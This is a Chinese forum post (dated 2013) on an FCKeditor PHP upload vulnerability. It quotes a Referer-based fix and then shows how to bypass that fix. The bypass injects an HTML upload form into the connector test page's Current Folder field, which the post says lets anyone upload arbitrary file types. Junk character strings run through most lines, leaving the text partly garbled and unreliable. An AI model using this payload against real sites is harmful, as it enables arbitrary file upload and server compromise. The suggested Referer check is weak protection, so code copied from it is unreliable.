漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
1 }8 E: K- L8 `( H网上给出的修复方案是
8 J8 r( V3 \: }: R T' o Q$ z" U修复方法,删除FCK编辑器用其他的编辑器& j: G# K9 X5 j+ y/ i
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
( {1 u1 ^: ]( ? C% d9 U6 v5 P- f! {在
% j, z0 H+ c! c$ \+ k+ drequire(‘config.php’);
: R! E: q: P2 t# ^) M5 f1 Qrequire(‘util.php’); }9 Q! O3 G6 a1 D, n# M, l
的下面添加以下代码—————————–
9 q& G. B' `1 l; R. f9 m3 \; b//防止外部提交1 A2 c& S% g# S( h# e& _
function outsidepost() x) R+ b" ?$ ~0 v# d7 G E
{# x% R7 W; F2 \: F: O) ?
$servername=$_SERVER['SERVER_NAME'];
/ t/ f/ g7 A V% S8 H; l1 Y0 Q$sub_from=@$_SERVER['HTTP_REFERER'];$ F. t9 L2 d0 h x1 S/ j
$sub_len=strlen($servername);
% c4 A: \1 p/ V( Q. f S0 G$checkfrom=substr($sub_from,7,$sub_len);6 h( I: ^7 v& D
if($checkfrom!=$servername){. o9 p7 c1 @( F% ~6 `3 R) v4 Y& Q2 W
echo(“you don’t outsidepost!”);! {% W3 W- K. z A
exit;
' c& b0 f: E4 C+ L$ C, p' P% P4 m' u} r5 k3 E6 O5 G
}1 }7 R- z- G' |$ z- j* n+ v' f% ^
outsidepost();
/ L: M/ X' T1 e防止外部提交,但是没有防止内部提交,
7 [3 _' H7 E* x, n利用方法:- r- R9 [, g# d+ W
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html) c( Z7 |: W2 G+ @+ ^7 K" H
2,在Current Folder 框输入
. Q3 `0 E" w% F2 W1 e. ]<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
S% {5 e+ S2 s; d8 F L- m然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。% f% m% {! j' R6 q7 g5 w9 F/ N0 O& _
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对